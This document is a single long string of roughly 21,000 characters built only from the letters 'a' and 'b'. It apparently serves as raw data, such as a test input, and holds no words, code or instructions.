abbababababaaabbbabbbbaaaaabaaaaabbbbbaababaabbabbbabababbaaabaaaaaabbbaabbabbabbabaaababbaaaabababbbbaaaaaabbaaaaabbabbbbbbbbaaabbabbaaaabbbbbbaaaaababaaaaababaababbaababbbabaaaabbaabbabbbbaaaaabaabbbabbaaabbbabbaabbbaaabaabbbbaaaaaaabbbbaababaabbbabaaabbaaaaaaabbaaaaaabbbaaabbabbaaaababbaaaabbabaabbbabbaaaabaabbabbbaabaaaaaaabbaaabababababbaabbabaaaaaaabbbaabbabbaaaaababaaababababaaaaaabbbaaaaaaabaabbbabbbabbbbabbaaaabbbabbaaaaabababaabaababaabbbaaaabaabbabbabaaababababbbaabbababbaaaaaaabbababbbaabaabaaabababbbaaaaaabbabbabaababbbaaaaaabbaabbaaabaaabbbbabbbbbbaaababababbbbabbbbbbaaaaabababaabbbbbbbbbaaaaabaabbaabaaabbbabbbbbabbababbaaabaababaababbbabbababbabbaaabbbaaabbababbbaaabaaaabbaaababbabbbabbbabbbaaabababbaabbbaabbbabaababbbbaaaabababbbababbbbbbbbababbbabbbbabbbaaaababbabaaababaaaaabbaabaababaabbbbabaabbaabbabaaaaaabbaabbbbabaaaabbaaaabababbbabbaaaabbabbaabaabababbababbaabbabbbbbbaababbabbbaabbaaababababaabaaabbbbbbbabbabbbbbabbabaaaabbabbaaabbbbaaababbaaaabbbbabaababaabaabbabaaabbbaabaaaaabaaabaaabaaababbaabbabbabbaaabbbabbbbbaaaaabaaaaabaaaabbbababbbaabbbbaaabbaabaabababaaabababbbabababbbbbbbaaababbbbaabbbababbaaabbbabbbbbaabbbaaaabbaabbaababbbabbbbbbaaaabaaabaabbbabbbaababaabbbbbbbaabbaaaabbaabaabbaaaabaabbbabbaabbbaabbbabbbbabbababbababaaaababbabaaaaabbbaaaaabbabbbaababbbaababbbaaabaaabaaabbbbbababbbaabbabbaaababbbaabababaabbbaababbabbbbbabaaaaaabaaaaaaababaabbabbbaababbaababaaaaabbabbbbbaaaabaaabbaabaaaabbbaababbaabbbbbbbbababaabbbbaaabbbbaabbbaabbbbbbaaaaaaaabaabbaaabbabaabaabaabbaabaabbbbaaaabababbbbababbaaabaaababaaaaabbbaabaabbbbbabaaabaaabaabbabaaaabbaabaabbbbbaaabbabbabbbaababaabbaabaaabaaabbaaaaaaaaaabbbaaabbabababbbaaabbabbababbbabbabaaaabaaaaabbbaababaaaaaabaaabbabbbbaaabbabaabbbababaaabababaabbbabbbbbabbaabababaababaaaaaabaaabaaabbaaaaababbaabaaabbaabbaaabaaaababbbabaaaabaaaabbaaaaabbaabbaaabaaaabbaababbbaabaaaaaabaaabaabbabbaababaaabaabbabbababbbabaaaababbbbbaabbaabbbbaaaabababaabaaaaabaabbbabaabababaababbbbabbababbbbaaaaabbaaaabbaababbaabaaabbbaabbababbaabbababaaaaaaabbbababbabaaaaabbaabbbbaabbaaaaaaaaabbababbababbbabababaaabbbaaaabbabbbbaabbbbaaabbbabaaabbbbbaaaaaabbabaaaaababbabbaaaaaababbaabbaabbabaababbbababbaabbaaababbbaaaababbaaaaaaabbababbbabbaaaaaaabbbbbababbabaabababaaaabaaaaaabbbbabbbbaaaaababababbaabaaabbaaaaabaabbaaaabaaababababaababaabababbabbbbabababbbabaabbababbbababbababbabbbbbbbaabbbbaabbabbbbaaabbbbbbaababaababbaabaaaaaababbbbbbababbbbabbabbaaaabaaababaabbbababbababbabababbabbaabaabaaababbaabaaaabaabbaaaabababaababbbabaabbbaabaabbbaaababbbababbbbaabbabaaaababababaaabaaababbbbaabbbaaaabaabaabbabababbbabaabbabbbbbaaabaabbabbababbbabaabababbbbaabbaaaaabbbaabbbaabbaababbbbbbababbaabbabaaaaaaabbaabaabaaabaaaaabbbbbbbabaaababaabbabbbbbabbaaaabaaaaabbbbabaaaabbaaaaabaaaabaaabbbbbabbaaabaaabbbbbaaaabbabbabbababababbaabbbaabaababaaabbbababbbaaababbaaaaaaabaabbababbababbbbbaababaabaaaaaabbabbbabbabaaaabbbabaabababbbabaabbaababbabaabbabababbbaababaabababababbaabbbbabaabbabababbbbbbaabaaaaaabaaabbaabbaaabbbbabaaaaabbbbaaaabababbbbbaaaabbbabaaaabaababbaabbbabbabbaaaaaaababaaabbbaabbaabbaaababaabbaabbabbbaaababbbabbabbbaabbababaaababbbbbabbbaabbbabbaabbbbbaaaaaababbaaabbbabbbbaaabbbaaaaaabbaabbbbabbabaabbbabaabaabbaaaabbbaaabbbabbbbaaaabaaababbbaababababbbabbbaabbabaabababababaaaababbbababbaaabbbbbbbbbbbaabbaaaaaabbbaabaabbbbabbaabbabbbaaaababbbabaabbbbbaabbbbabaaaabbbbbbabbbbabbababababbabbbaaaaabaaabbbaabbaabbbbbababbbbbabbababababaaaaaaaaaaabaaaaabaaaaaaaabbbaaabaababaaabaabbaabbabaaaaababbbabbbaaaaabbaaaaaabaaaabaaabbbaabbaabbbbaabbbaaaaabbabbbbabbbbabbaabbbaaaaabbaabbbbaabbbababbabbaabaabbbbbababaabaaaaaababbbbabaaababbabaabbaaaaaababaabbaaabaaaabaaaaabbbbbbaaaabbaabbbbaaaaabaaaabbaaabbabbaabbaabababbbaaaabaabaabbbbbaaababbbbaaabbabbbababbaaaaabbabaababaababbaabababbabbbbbaababaababaaaabbabbaaabbaabababbbaabbbaababbaababbaaaabbbaaabbabbabbaabbbababaabaaabaaabbaaaabbbbbaabbaabbaaababaabbbbbaababababaaaabbbbbaaabbaabbbaaabbbbbbababbbbaaaabbabbabbaabbabbbbaabbbbbbbbabbbababaaaababbbbbbabbbbbbabaaaabbbabbbaabbbbabaababaaabaaaaaabbbababbbaabaaabbabaaabaaabbababbbbbbbbbabbbabaabbabaaabbabaaaaaaababbabbbbaabaaaaaababaabbabbababbbaaaabaaababaaabbaababbbabbababbaabbbababbabbaaabbbabbaaabbbbabbaabbabbbbabbabaaaaababbbbbbaaabbabaabbbaabbbbabbbabbabbaabaababaaabaababbaabaabbbbbabbaaabbbbaaabbbabaaaaaabbbbbbababbbbbbaabbbababbbabaaabbbaababbaaaabbaaabaaaabaaabbaaaabbabbabaababbaaaaabbbbaabababaaaaaaaaaabbbbabaabbbaabbbbaaaabaaaaabaaaababaaabaaabbbbaaabbabbaaabaaababbbabaabbabbbbbaababaabababaabbbbabbbbbaabbbabbbbaaabaaaabaaaaaaaabbaababaabbabbbaaaababbabaabaaaaaabaabaabbaabababababaabbbbabbaabaaababaaabbbbabbabbbaabaababbbbbbabbbbaaabbbbbbbaaababbaaaaaabbbbbabbbaababbbaaabaaabbaaaababaaaaabbbbabaabbbabaaaaaaaaaabbbaabaaaaabaaaabbbaabaabaaaabbaaaaaabbabaaaabaaabababaababbaabbbaaaaabbaaababbaabbbbbaabbaaaabbaababbbbaaabaaaabaaaaaabaabbabbbabababababbbababbaaabaabababbaabaaaabbbaabbbbabbbbaabbbbbaababbaaaaababbaabbababbbbbbbababaababaaaaabaabaaaabbbbbabbabababbbabbbbaabbabbbababbaaaaaabbbaabaaaabaaaabbaaaabaaaabbabbabababbaaabaaabaabbaaabaaaaabaababbbaabaaaaabbbabbaabababbaaaaabaabbbabbabbabbbbbabababbabbbabbabbaaaaaabbaaabbbabbaabbbabababbbabbbbababbaabbbbaaabaaababaabbabbbabaabaabbabaaaabaaaaaabbabababaabaabbabbbbabbabbbbbabaabaaabbaaaaaababbabaaaabaaaabbabbabababbbbbbaaabbbbaababbbabbbabbababbabbabaaabbbbabbabaabaaabbabaabbbabbabbaabbbbabaabaabbabbbaabaaaaaabaabbbbbbaabababbbaaabbbabbababbbaaaaabaaabaaaababbbbaabaaaabababaaaabbbabbaaaabbbbabababbaabbabaaababaaaaababbbaaababbbaababbababbaabaabbbbbbababaabbaaaababbbbabaaababaaaabbababababbbaaabbabaaabababbaaabaaabbbbaaabbbbaaabaaaabaaababaaabbbaaaaabbabbbabaabaabbbbbabbbabababaaaaaaababbbbbaababbbabaaabbaabbaaaaaabbababaaabaabbabaababaabbabaababbabbbbaaaabbbbabbaaaaaabbbaaabbbabaababbbbbbabaaaaababbbbaabbaabaababaaabababbaaabaabbbbaabbaabbbabaaaaabaabbbbaabbbaabbbbbaaababbabbaabbbababbaabbbbaaabaaaababbababbbbabaaabbabbabbbaaaaaaaaaabaabbaaaabbbbaaabaaaaaaabbaaaabaababbbaabaabbabbabaaababbbaaaabbaaaaabaabbbaaabaaaababababbbaabbababbaabbaaaaaabbabababbaaaabbbbbabbbababaababbbbabbbaababbbbbababaaabbababbabbbaaabbaaaaaabaabbbaaababbbababbbbbababbaabababaaabaabbbbaabbbbaaabaaabbbaaaaaaaaabbabbaaabbabbabaaaabbbbaabaaaabaaabbabbbaabbabaaaaaabaaabbbbbabbaabababaababbaababbaabbbbbababaababbaabaababaaaaaaabababbbabaabbaabbbabbaaabaabaabababbabbbaabababbbbabbabbaaabaabbbaababbbabbbbbbabbbabbaabaaabbaaabababbaaabbbaabaababbaaaababbbbbabbabababaaaababbaaaaaabbbbaaaaaaabaabaaaaabaaabbbbaabbbaabaabbbbaabaabbaaaababababaabbbbaabbbaabbbbbbbabbbbabbaaaaaabaaaaaababbabaaaaaabbabaaaabababbaabaababaababbababaabbaabaababbaabbbbbbbabbbbbabbbaaabbaaabbabaaabbbababbbbababbbbaaaabbaabbbaabaaaabbbaababababbaaabbbbabbababaaabbaaabbaaabaabbaaabbaaabaaabaabaaaaabbbbbbabbbbbbaaabbbabababbaaabbabbabbbaababbbbabaaaaababbbabbabaabbaabaaaaaababbbaaaaabbbaabbbbaaaabababaaabbabbbbbbabbbaabbbbbabbabbbabbabbabababbbaaababbbbaaabaaaaabbbbbbbbbbbbbaabbbbaaaaaaabbabbaaabababababbbbababbaaaaababbabababbbaaabbabaabbabaababbababbbabbbbbabbaabbbabbbbbaabaaabaabbbbbbaaabaaabbbaaaabbbbbbbbbabaaabbabbaaaaabbabbaababaaabbaaabbabbaaaaabbbaaababbababbbaaaaabbbabbbabbaabbabbbaababbbaaababbbaaabbaababbaaabbaaaaabaabaabbbaaabbabababbaaabaabbabbbbbbaaababaabbbbbabababbbabbabaabbaababaabbbbaabaaaababbbabbbbbaabbabbabbabbbbaabbabaaaaaaaaaaabbbbabaaaaaaabbabaabbbababaaaababbaababbbbabaaaababbbabbbbbbbbaaabbbbaaaabbaaabbbaaababaabbabbaaababaaabaabbbabbbaabaabaabaababaaabaaabbbaabaaabbbbbbbbababaaaaaabaabbbbbbabaabbabaabbabbbbbaababababbbababaabaabaababaaabababaabbaabaabbbaaaaaaababbbbbabaaabbbbbbbbaaabaaabbbbbaaabbaabbaabaabbababbabbaababababbabbbbaaabbabababaababaaaaaabababbabbaababbbbbabaaaababaababbabaaabbbbabbbbabbbbaaaabaaababaaabaabbbaaabbaaabbbbbaabaabaababbbbbbbbbabaaababbaabbbaabaaaaaabbaaaabaaaaabaabaaabbbbaabaaabbaaaaaaabbbbbbbababbaaabbababababababbababaaabbbabbaaabbaaababbaaabaaaabbabbbabaaaabbaaabbbaabbbababbaaababaabaabababaaaaaaaaaaaaabaaababbbbbbbabbbaabbbbbbaabbbbaababbbbbabbaabbbaaaabaabaabbababbaaabbbbbaabbbbbbaaaabbaaabaaabbbaaabbbbbbbbabbaababbaababaaabaaababbbbababbbaaabbbbbbabbabbbbaaaaababbaabaaaaaaabbbbababaabbabbabbabaaabbbbabbbbbbabbbbbbabbabaabaaabbbbbaabbaabbbaabaaababbabbababbbababbabbbbabbabbbbbabaaabaababaababbbaaabaabbaaababababaababbbabbabbbabbabbabaaabaabaababbabbbbbaabaaabaabbbbbbaabbbabbbabbbaaabbabbbaaabbbabbbaaaaababbbbababbbbaaaaaaabbbbbbaabbababbbaabbbbbaabbabbaabaaaaaaaababaaabbaaaababbababaaabbbaaaabbbaaabbabbaabababbbaabbababbabbbbababbaaabbaabbaababbbabaabbabaabaababbbaabaabbaaabaabbaabbbaaaabaabbaabbaabbbbbbbaaaaaabaabbaaaababbbaaabaaaaaabbbbbbaaaaaaaaabaabaabbbababaaaaaaaabbabaaabbaaabbabbbbbaabbabaabaabababbbbbaabaaaaabbabbaababbbabbbabbababbbaaabbbbabaaaabbbabbbbaababaaabaaabbabaaabbaaaabababbbabaabbbbabbaaaabbaaababbaabbbaababababbbbaabbbababaabbbbbabbbabababbbaabaabaaababaabbaaaaabbabbaaaaabaaababaabaaaaaabbbababbbbbbaabababbbbaaaababaababababbaaaaaaaabbbabaaaabaabaaaaaaaaaaaabbbaabaaaabaababaabbabaaabaaabbabaaaabbaabbabaabbabaaaabaaabaaabaaababbbbabbabaabaaaababbaaaaababbaabbaabbaabababaaababababbaabbababbbbaabbbbabbaaabbabaabaabaabaabaaaababaaaaababbaaabaaaaabababbaaaababaaaabbaabaaaaaaabbbaabbaaaabbabbbabaababbaabbaabaabbabaabbbababbabaabbbabbaaaaaababbbbababababaaaaabbbabbbabbaaabbbaaababbbabbaaabbaaaaaababaababbabbbaaabaaaaabaaababbbaaaabbaababbabbaaababbababaaaabbbbabbabaaabaababbbbbbbbbaabbaaabbbabbaaabbbbabbabbabaaabaabbbbbbaaabaaabbbbbabaaabbbbaabbababbaabbbaaabaaaabbbaabaaabbbabbbbbbbbbabbbaaaabbbaabbbaaabababaabaaabbbaaabababbbabbbbabbbabbababbbaabaaaabbababbbbbabbbababaaabbaaabaabbbaabaabaaaabaaabbbabaaabababaaabbbbabbabbbabaababaaaabaaabbabbaabaabaabaabbbbbbbbbaaabaaaaababbabbbaabaaaaabbbbbabbbaaaaabbbbabaabababbabaababaabbabaaabbbbbbbbbbbabaaabaaabbbbaaababbabbaabbaabbaaabaababbabaaabbaaaaaaabbaaaaababbbbbabbbbbaabababbbaabbbaabbaaaabbabbbaaaabaaababaaaaabbbaaababaabbbabbbbabaaababbbabaaaababbbbabbaaaabbbaabbbaaabbabbabbaabbbaabbbaaaabaababbabbbbbbabaaababbbbbbbaaabbbbbbaaabaabbabaabaabaaaabbbaababababbaaaaabbbbaaabbbaaaababababbaabaaabbaaaabbbbbbbabbaaaaaababbbbbbabbaaabbbabababbaaaaababbabbbbabbbabbaabbbbabbbaaaabbaaaabbbaababbbbbabbbbbaababaabaaaabbbbbbaabaabbbabbabaaaaaabaabaaaabbbbababaabababbaabbaabbabbaaaaaaaaabbbaaababababababaaaaaaaaabbaaabbbabbabaababbaaabbbabbbbaabababababbbabbabbbabbaabbababaababbaaaaabaabbbaaabbaabbbbbbbabaaabbbaabaabbbbabbabbaaaaabbbabbaaabbbaabbaababbaaabbaabbbaaaaaabaabbabbbaabababababbbbabaabaaababbaaababaabbbaabaaabbbbabbaabbabbabbbaaaaabbaaabbaababbababbabbbabbbabbbbabbabbbabbabababbbbabaababaaabbabababbabababbaabaabbbababababababbbbbbaababbaabbaaababbbbbaaababbaabbabbabbababbaaaaaabbbbbabaabbbaaabbaabbaaabbbaababbabaabababbabbbaababaaaaababaaabababaaabaaabaabbaaaabaabbaaabbbaabbaaaaaaabaabbbbababaaabbabababbababbbbabbabababaabbabbaabbabaaabbaabbabbbaaaaaaabaaaabababbaabaaabbbaabbaabbbbbbbabbbaaabbaababbabbababbbbbaabbaaabbbbbbaaababbaaaaabaababbbabbabbbbabaaaababaababaaabaaabaaaaabaababbabbbbaabbababaababbbbaabaabbabababaabbaaaaabaaabbabaabbabaabbbaabbbabaaaabbbbaaabbbababbaabbbbababbbaaaaabaaabaaaabbaaabaaaabaabaaaaabbaaabbbaababaabbababbbaaaaabbaaabaabbbaaabbaaababaabababaababbbaaabaaabbaaabbbaababbbabaabbabaabbaaababaabaaabbabaababbbbaaaaabbaabababababbabbbaaababbbbaabbaaaabbbbaaababaaabaaaaababbbbbbaaabaababbbbbbbaaaababbbaabbaabbbbbaaabaaabbaababbabbabaabaaabababbbbbaabbbabaababbbbbabbbaabbbbbbbbabaaaabbbaaaabbababbaabaabbaaaabbabbbbbbaaabaaaabababaabbbbaaabababaaaaabbbbaabbaabbaaaabaabaabbbabbabababaaaabaaabaaabbaabbbaabbbbbaabbabbbbaabbbabaabbbbabaaababaababbbabaaabaaabaabaaabbbbbbbabbabaabaabababbabbbbaababbabababbaabbbbabbbaabbbaabbbbbbaabaaaaabaaaaabaababbabbabbbbbababaabbababaabbbababaababaabaabababbaaaaaabbbaabbbbbaaaabbaababbbbabbbababaaaaaaabbbabbbbabbbaabababbbabaaabbabbabbaabaabbbabbbaababbabbaababababbaaaabbbbaababbbbabbaabbaabbbaabbbaabaaaabbaabaaabaaabbbababaaabaaaaababaaabbbbbabbbaababbbaabbaabaaaabaaabaabaababaaabababbabbbabaabbabbaaaabbababaaaabababbaaabbaabbbabbbbbbbaabbbbaaaabaabaaabbbababaaabbbaaababbaababaabbabbbbaaababaababababaaaaaabbbbbaabaabababaaaababaaaaaabbababaaaabbabbabbaaaaaabbabbaabbbabaabaaabaaaaaabaaabaaabbaaaaaaaabababaaaaaabbabaabbbbbbabaabbbbbbbabaaaaaaaaaaabbaaaaaabbbbbaaaabaabbabbbbbaaabbbabbbaaabbabbbbbbbabaabbbabbaabbaabaabaabbbabbaaaaaaaabbbbbbaaabaababaabbbabbbabaabbbbbabaabaaababbbabbaabbbabaaaaabaabbaabbaabbababaababbabbbbaaaabbaabbbbbbbaabababbabbbbbaaabbbbbbaaaaababbbababaabbaabaaaabaaaabbbbbabbaabbbaabbabbaabbaaaababbaabbbabbabaabaabbbaababbaaaaabbababababbabbbabaaaabaababbbbbabbbbababaabbabaabbababbaaaabbbbbaaaaabbabababbbabaaaaaaaaabaaabbbbaaabbabbaaabbbaabaaaaaaabbaaaabaaabbbababbbbaaabbabaabaababbbbaabaaabaabaaabbbaaabbbabbbbaaabbabaababbbabbbbbabaabbaabbbababbaababbaaaabbabbaabababbbababbbaababbbbbaaaababbabbabaaababbbbbabaaabbbbbbaaaabaabababababbababbbababbabbaaaabbbaaaaaaabababbbabbbbabbaabbbbbbbbbbababbbbaaaababaaaabbabbaaabaabbabababbaaaabbbbbabbaabbbbabaabbaabaabaaababbaabaaaaabbaababaabaaababbbbbaaaabbbaaaabbbabaabbbaaabbabbabbaabbaabababbbabbbabaaaabaabaababaabaabbbbabbaaaabbaaaababaabbbabbaaabababaabaabbabbabbbbaaabaaababbabbaabbaaaaaaaaabaababbabbbbbaaaaabbbaababaaabaaabbaabbabaaabbbaababbbbabaaabbaabbbbbbbbbbaabbbabbbbababaabaaabaabbbababababaaaaaabaaaaaabbbabaaabbabaabbababaabaababbbaaabaababbbabbbbbaaababbaaabbbaabaababaabaaabbbabaaaaaababbbaaabbbaababaababbbaabbabbbaabbabbababbbababbaaababaaabbbaabaaabaabbbabbbbbbbbabaaaababaaabaaaabbbaaabbabbbabbabbabbabaaaaababbbabbaaababaaaaaaabbbbbbaaabbaabbaabbbbabbabaaabbbabaabbbabaaaaabababaabaabaaaabaaaaaaabbaabaaaaaabbbbabababbbbbbbbbaabbabaabbbbaaababbababbbaaaabbbbbbbaababbaabaabababaaaabbbabbbabbaaaaabababaabbbbaababbbaabbbbaabaaaaabbbbaabbaababababaaabababaaabbaabbbbbaaaaaaabbbaabababaaaaababaabbbaabbbaaabbaaaaaaaabababaababbabbbbabbabbbaaaabbbaaabbbbabbaaabaabaabababaabaabbaaaaaaaabbbaabbabbbaaaabbbabbbabbbbaabbbaabaaabaaababababaaaaaaaabbbbabbababbbaaabbbabbababaabbaabbbbaababbbaabbaabaabaababbbabbbbbabbabaaabaaababababababaaabbabbababaaabaabbabababaaaaabbbbbbababbbbbaaaababbabaaabaaaaabbbbabbaabaabbbaabaabbababbabbaaaaabbbbbaababbabababaaaaababaabaabababbaabababbbbbabbbaaaabbaabbbaababaabbbaabbbaababbabaaaabbbaaaabbbabbabbabbbaabbaababbbbabbaabbaabbaaabaabaababbaabbaaaabbbababbbaabaabababbbbaababaaaaaaabbbaaaabbababbaaaabaaaababaabbaabaaaabaabbababbbabaabbabbaabaaabbabaaaaabaabbbaaaaabbbabbbbaabbaaabbabaaaabaaaabbababbababbaaaaabbabbbaaababaaabbababaabaabbbaaaaabaababbaabbbaaababaabbabaababbbabaaaabababbaaabbbaaaaabbaaaaabaabaaaabaaaaabbabbbbbaabbaaaabaabbaaaabaaaaabbaababaaabaababaabababbaaababbbbbaabbaabababbabbaaaaababaabbabbbaaaabbbbbaabbaaababbbaaaabaababaaaabaaaabaaaabbbabaaaaabbbbaabaabaaababbbaabaabaaabbbbabbabaababbbbaaabababbabaaabbaabbbbaabaabbbbbbbbaaaabbbbbabaaaaaabbbaabaababababaaaabbbabbbabaaaabbbbaabbbbaabbbbbbaaaababaaaabbaaaaabaabbbaabaaaaaaabaabaaaabbabababbbbbabbaaaaabaabbbbabbbaaabbabbaabaaabaaaababbaaabababbabbaabbaaababbabbbbbabbabbaaababaaaaabaaaaaabaaaaabaabbbbbabaaaaabababbaabbabbbaaaabaababbaaaaababbbbbababaababbbaaaaababbbbbbababbbaabaaaaabbbaabbbababababbbbaababababababaabababbbbbabbabaabbbabaababbbbbaaabbababbaaaababaaabaaaaaabaabbaabbaabababbbbaabbaaabbaaaabbabbbabbbaaabababbaaaaaaaababbbbbaababbabaaabaababaaabbaabababbbbbbbbbabbabaabbbabaabaabbababaaababaababbabababbbbbbabbabbaaabaabbbabbbbaabbbbbaabaaaabbaabbabbbaaaabbbbaababaabbaabaaabbaaabababbaaabbbbaabbbbaaabaaaaaaababbabbbaaaaaabbabaabbabbbbbaaaaaaabaabaabbaaababaabbabbabbbbbababbaaabaaabaaaaaabbbaaabbabbbbbaaabbbbabbabaaaabbbaaabbaaaabbabaababababbbbbaaaabababbbbababbbabbaaabaaaaabbaabaabaababbaabaaabaaababbbbbaaaabbabaabbabbbaababaabaababaabaabbbbbaaaaaaaabaabbababbabbbbabbababaaababbbbbabbbabbaabbbabaaaaabbaababbabbbbabaaaaaabbaaababaaababbaabbaaabaabbbabbabaaaabbbaaaababbaabbabaaabaaaabaaabbbaaaabbabbbbaabbaaaabbbbaaabbababaabbaabbababbbabbbbbbbbbaaababbbabbabaabbbabaabbbaaaabaaaabbabaabbbaabbbbbababaababbbbabbaabbbbbbaabaabbbabbaaabbbaaabbbaaaaaabbaabbabaaabbaaaabaaaababbbbaabaaaaaabbabaaababaaabbaabaababbabaaaabaabababbaababaaaabaaababbbbbbabbaaabaaabababbbaabbaaaabababbbbbaabbaabbbbbabbabbaaabaaaabbaabbbabbbbaabbbaababbabbbaaabaabaabbaaaaaaaaaaaaaaaabaaabaaaabbaaaabababaabbabbabbaaaaabbbbaabbabbbaabbaabbbaaabbbabbaaabaaabbbbabababbabbbaabababababaabbbbbbbaaaabbaaabbaaaaabbabbabbaaabababbabbabababbbaaabaaabaaababbbbabbbaaaababbaaabbaaaaaabbabbaabbbbaaaaaabbababbbbbaabbbabbabbaabaaaaabaabbbbaaabbaaaaaabbbaaababbabbbaabaaaaaabbabbbbaaaabaaaaaabbbabaaaabbabaaabaabaaabbbabbababbbbbbbaaabaaabababbbabaaabbabbbbaabaabaaaaaababbaabbaabbabaaababbaabbbaababaaaabbbbbabbbaababbabaaaaaaabababaaaabbaabbabbbababaabbabbaaabbababbbbabaaababaababaabbbbaaaabaaabaabbaababbaaabbbbababbabbaaaaabbaabaabaabbbaabababbabaaabbaaaaaaabbabababbaababaaaabaaaabababbabaabbaaaababbabbbabaababbaaababaaaabbabaaaabababbbabbababaabaaabaaabbbabbbbabbbaabbbbabaaabaabbaaababaaabbaabaaabbabbbababbbaaaabbbaaabbbababbbaaabbabbbaababbaaaaaaabbbbaaababbbbbabaabaaababbaababaaaaabaaabbbbbaaabbbaabbbbaaabaabbabbbbbbbabbbbbababaabaaabaaaaabaabaabbabbbabbaaaabaaabbaaaabaababababbbaabbbaaabaababaaababaaaaaabbbabbbbaaaaaababbabaabbaabbabbabaaabaabbaaaaaaaababbaabbaabbabbbbbbbbabbabaabbbbbaaaabbaaaabaaabbbabaaaabbbaabaabbbaaababbbaaaaaabbbaaaababaaababbbbaabaabaabaaababbabaabbbaaababaaabaababbaababaababbbbbbbabbbaaaabaabbbabaaaababbaababbbaaababbabababbbabbbbaaabaaaabababbbbaabbbbaaabbbaaabbbabaaabaabbabababbabbababbabbaabbbbbaaabbabbbaaababbbbaabbbbbbbbbbaabbabbaaaabbabbabaababaaaabaabbbbaabbbbbaababbaaabbbbbbaaaabbaaaaababbbbaabbabbbbaabbbabbababbbabbbbabbbbbaaaaabbbbababbaaababbababbaaaaababbaabbabbbbabaaaaabbbbbbbaaababaaaabaabbaabababaabbabbbaaaaaababbbabbaabbabbaababbbbbaabbaaabbbbbababbabaaababbabbbababaaaababababbbbbbabbabaaabbbabbabaabbabbbbabaaaabaabbababbabbabbbbaaaabbbabbabbbabbabbaabbbbbabbaaaabbabbaaaaabbabaabaaabaabaabaabbabaabaaaaaabaaabbbabaabbabbbabbaabaabaaaabaabababbbbbbaaaaaabaabaaabbabbbbbababbabbababaabbaaaaaabababbaaaaabaabababbbbbabbbbaabbabababaababaaabbbabababbaaabaaaaaaaaabbaaabbabbbaaaaabbaaabbababbbbaaabaaabbbabbaabaaabbbaabbababbaabaaabbabbbabbaabbbaabaaabbbbabbbbababbbbbbaababaabaaaaabbabbbabaaaabababbabbaababaaabababbababababaaabaabaabaababbbabbaaaababbaabaaabbbbbbabbababababbbbaaabbabaabaaaaababbabbaaabaaabababbaabbbabaababaaabaaababaaababaaaaabbbaaaabbababaaaabbabbaabbbbabbbaaaabbbbbabaaaabbbaabaabbbbbbbbbbabbaaabaabaabbbabaaababaabbbaabbaabbaabbbbbabbaababaababbaaabaaaaaabbbbabbbbbbabbabbaabababababbaaabaabbaaaaaabababbbabbaaaaaabbabbaaaaaababbbbabaabaababbbbababbaabaaabbaaabababaababaabbaabbabbbabbababbabbbbababababbabaaaabaaaabbaaabbbbbababaababbaabaaaabaabaaaababbabbabaaaaaabbbaababbaaabbbbbabbbbbbbabababbabbbaaaabbaaaaaabbbbaaaaabbabbbbbaaaaaabaabbbbbababaaabbaaabbaaabbbbabbbaababaababaaabababbbababaaabbbabaaaaabaabbaaaaaabbaaaaabbabaabbbbbbaaabbbbbbbaababbaabbbbaabaaabbbbbbbbaabbaabababaabbaaaaabaabaabbbabbbbbbbaabaabbaaabbabbababbaaaabbabbbbbabaaaabaaaabaababbbababaaabaabaababaabaaababbbbbaaaaaaaabbababbbabbabaaabaabbbbabaaaaababbaaabaabbababababaabaaaabaababbaabababbbbbaababaaaabbababbbabaaabbbababbbaaabbbbabbaabaabbabbbbbababbbbbbabaabbaabababbbabbabaabbaaaabaaabbbbabaaababbbbbbabaaaabbabbabaaaaababaabaabbbbbabaabbbabaaaaabbbbababaabaabbaaabaabbbabbbbaaabbaabaaaababbbbaabbbaabbaabbabbbabbabbababbabaaabaaaabbaabababbbaabbaaabababaabbaabaaaabbabbabbababaabaabbaaaabbabababbbbaaaaabbaaabaaaaaaaabaaabbbbbaaabbaaababaaabbabaaaabbbaabbbbbaaaabbabbaaabbaaabbabbbabbabaaabbabbaaaaaaabbabbbbbabbbbaabaababaababbaaaabababbaaaaabbaaaababaabaababbabbabbabaaabbaabaaaabbbbabbbbbababababaaabababbabbaabbaabbbabbbbbaaabbababbbbaaaaabbaaaaaaabbbaaaaaaabbbbabaaabbaabaabbbabbbaabbaabbabaaabaaaabbabaabababaaaabaabababbababaabababaabbaaabbbbbaabaabbaabbbababbaababbbabbabbabbbaaaabbbaabaaabbbaaaabbabaababbbbaabbbbaabaabbaaaaaaaabaabaababbaaaaabaababaabaabbbbabaaaaaababaaaabbaaabbaaababbabaaaabababbbbbbbababbbbbbbaaabbbbbbbbbabbaaaaaaaaabaabbbbbbabbaaabbabbabababbbabbabaaabbaabbabbbaabaababaabbababbabbaabaaaabaaababbaaabbbaaabbbbabbbbbaababbababbbaababbbabbbbbbabbbbabaabaaababbaabbaaabbbbbaabaaabaaaaaaabaaaaaaaabbaabbbaaabbbbbaabbabaaababbbababbaabbababbababbbaaaababaaaaabaabbaaaaabbbbaaabbaabaababbaabbbabbbabababaababaaaababbbbbbabaaaaaababaabbbabbbbaaabbabbaabababbabbaabaaaaaaabaaaabbabbabbbbbbbaaabbaaabbbbbaabaaaabbabbbaaabbababaabbabbabaaabaaaabaaabbbabababbaaabbbbabababbbaaabaabaaaaaabaaabbbbbbbaaaaabbbaabababbbaaababbabbbbabbabbbaababbbbabbbaabbabaabbbababaaabbaaaaaaabbababbabbbababaaabbaaabbbaabbabaabbabbbaaababbabaaaaaaaabaaabbbbabaabaabbbbaaaabbbaabbabbbabbbbabaabbbaaabbaabbaaababbbbbbaababbabbaaabbbbabbaabbbbbbaabbbabbbbbbabbbabbababbabababbbbaabbbabaaabbabbaaaabaabbbaaabbabbbaaaabaabababbabbbaaabbbaabbaaababbbbaaabbbbbbabbbabaabbababababbbbbabbababbbbaabbaaabaabbbbaababbababaabbbbbaabaaabbbaaabbbaaaaabbbabbabaaabaabaaaaaababbbbabbabbaaababbbabaabbabbaaaababaabaabaaaabaababbabbaaaaabaaaaaababababbbbaaaaaababaaabbbababbbaaaaaaababbaababbabbabaabbaabbbabaabbaaabaabaaabbbabaabbbbabbbaaababbaabbbbbabbbaabababbbbaababababaabbaabbbabbaababaaabababaaaabbbbaabbabaaaaabaaaabaabababaaabbbbabaabaaaaaaaabbbaaaaabbaaaabbabababaabaaabbbbaabbababaabbaaaaaaaaababbbbbaabbaaabaabbabaaabaabbbbbaaaabbaabaabaaabaabbbaaababbbaabbbabbabbbaaabbabbaabbabbaabbaaabbbabaababbaaaabbbabababbaabbabaabaaabaabbbababbabaaaaaabaabbaabbabbbabbaaaaaabbaaaabbababbababbbbbabbabbaaaabaababababaababbbbbaaaabababbaabbaaaabbaabbbaaaaaaaabaaaabbababaabbaabababaaaaababaabbaaabababbabaaaaaababbbb